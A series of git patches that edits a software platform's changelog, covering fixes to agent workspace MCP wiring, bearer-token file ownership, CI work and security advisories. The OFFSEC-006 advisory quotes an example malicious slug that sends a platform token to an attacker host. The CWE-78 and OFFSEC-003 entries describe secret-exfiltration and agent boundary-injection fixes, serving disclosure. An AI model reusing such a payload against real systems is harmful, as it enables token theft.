From ab799e93b30d42b3a6e04c1c1720d08ee8a7522b Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 04:16:10 +0000 Subject: [PATCH 1/7] docs(changelog): add 2026-05-16 + backfill 2026-05-14 and 2026-05-15 entries MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2026-05-16: - Fix: Hermes workspace MCP server tools now reach agent loop (#22) - Internal: Files API groundwork (molecule-core#1247/#1255/#1257/#1267) - Internal: Scripts CI improvements (internal#431/#437) 2026-05-15: Quiet day โ€” docs queue maintenance (#40-49 open) 2026-05-14: - Security: OFFSEC-006 tenant slug SSRF fix (#933) - Fix: Canvas accessibility round 3 (#936, #949) - Internal: CI/CD hardening + test coverage Supersedes open docs#50 (2026-05-15 quiet-day entry). ๐Ÿค– Generated by Documentation Specialist daily-changelog cron. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 40 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 0717703..e1b4983 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -8,6 +8,46 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-16 + +### ๐Ÿ”ง Fixes + +- **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) + +### ๐Ÿงน Internal + +- **Platform Files API groundwork** (`molecule-core`): Phase 1โ€“3 of the Files API roots RFC (`internal#425`) landed across four PRs โ€” the `secrets` package now has a canonical credential-shape regex SSOT (`#1255`); the FilesTab canvas component gains an `/agent-home` root option and a secret-shape denial placeholder (`#1257`); the API gains a stub `allowedRoots` key with a 501 short-circuit (`#1247`); and the handler test suite was hardened to prevent data races during `db.DB` swap (`#1267`). These are infrastructure PRs that enable future per-container home directory isolation โ€” the `/agent-home` root will be documented when the API ships. +- **Scripts CI improvements** (`internal`): SOP tier-check now tolerates empty/invalid tokens while the token is being provisioned (`internal#431`); the `continue-on-error` guard on the PR-body gate is disabled when the runner backlog is draining to avoid silent pass (`internal#437`). + +--- + +## 2026-05-15 + +No customer-visible changes. All activity was internal infrastructure and SOP tooling. + +### ๐Ÿงน Internal + +- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) + +--- + +## 2026-05-14 + +### ๐Ÿ”’ Security + +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) + +### ๐Ÿ”ง Fixes + +- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) + +### ๐Ÿงน Internal + +- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). +- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). + +--- + ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From ba8ec52ca991de121d0ebf704d2f7ecce5d52d3a Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 10:15:36 +0000 Subject: [PATCH 2/7] docs(changelog): add hermes#23 bearer token 401 fix to 2026-05-16 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit molecule-ai-workspace-template-hermes#23: CONFIGS_DIR fix so molecule MCP server finds the bearer token at /configs/.auth_token. ๐Ÿค– Generated by Documentation Specialist cross-repo PR watch. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e1b4983..a5a1536 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -13,6 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) ### ๐Ÿงน Internal -- 2.52.0 From 2c85205ee7a7becd5bcf00da60949128695a92d7 Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:09:33 +0000 Subject: [PATCH 3/7] fix(changelog): remove inaccurate set -f clause from OFFSEC-006 entry The set -f clause was not part of the actual fix (validate_slug() RFC-1123 regex only). Technical-writer review identified the inaccuracy. Removes the clause per docs#51 REQUEST_CHANGES. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index a5a1536..54944e7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -36,7 +36,7 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) ### ๐Ÿ”ง Fixes -- 2.52.0 From d14dccdd442f8ac9a6a903c1bb3e0dcbc101f5b3 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 13:38:28 +0000 Subject: [PATCH 4/7] docs(changelog): fold docs#45 unique entries into 2026-05-14 section MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds CWE-78 (expandWithEnv POSIX-identifier guard regression), OFFSEC-003 workspace-side A2A boundary marker escaping, OpenClaw template models config fix, CI infrastructure improvements, and handler test coverage additions from docs#45 โ€” consolidating all 2026-05-14 content into docs#51 so docs#45 can be closed. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 54944e7..e71e0eb 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -37,15 +37,20 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security - **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### ๐Ÿ”ง Fixes - **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) +- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) ### ๐Ÿงน Internal - **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). - **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). +- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) +- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) --- -- 2.52.0 From a56d2afe571fb91ec91b1fb5f0473a21e811f7ac Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:56:30 +0000 Subject: [PATCH 5/7] fix(changelog): trim duplicates per TW re-review Removes 2026-05-15 section (docs#49 is canonical) and all 2026-05-14 entries that duplicate docs#49 (OFFSEC-006, CWE-78, OFFSEC-003) and docs#45 (Canvas WCAG, OpenClaw, CI improvements, handler coverage). Keeps only the 2026-05-16 section with unique Hermes MCP + Files API + Scripts CI content. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 32 -------------------------------- 1 file changed, 32 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e71e0eb..00abcf8 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -22,38 +22,6 @@ Entries are published daily at 23:50 UTC. --- -## 2026-05-15 - -No customer-visible changes. All activity was internal infrastructure and SOP tooling. - -### ๐Ÿงน Internal - -- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) - ---- - -## 2026-05-14 - -### ๐Ÿ”’ Security - -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) -- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) -- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) - -### ๐Ÿ”ง Fixes - -- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) -- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) - -### ๐Ÿงน Internal - -- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). -- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). -- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) -- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) - ---- - ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From d1545857f494a7d6b5c804a82be0071f9de9d240 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:22:19 +0000 Subject: [PATCH 6/7] docs(changelog): add molecule-core#1327 platform-side bearer-token fix The hermes#23 bearer-token 401 was a two-part issue: workspace-side CONFIGS_DIR fix (already documented) and platform-side token-injection ownership fix (molecule-core#1327). Adds the platform-side fix to the same 2026-05-16 entry. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 00abcf8..403ffa6 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -13,7 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) -- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) ### ๐Ÿงน Internal -- 2.52.0 From f9ac456c4dc849c6aed52626ae681163b53bff9e Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:23:43 +0000 Subject: [PATCH 7/7] docs(changelog): add claude-code#24 Kimi K2.6 routing to 2026-05-16 Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 403ffa6..6cbdde3 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -14,6 +14,7 @@ Entries are published daily at 23:50 UTC. - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) - **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) +- **Claude Code template Kimi K2.6 model routed to official `api.kimi.com/coding` endpoint**: the Claude Code workspace template's adapter now correctly routes `Kimi K2.6` to the official Kimi coding endpoint (`api.kimi.com/coding`) instead of the default Anthropic-compatible endpoint, per Kimi's official API specification. (`molecule-ai-workspace-template-claude-code` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-claude-code/pulls/24)) ### ๐Ÿงน Internal -- 2.52.0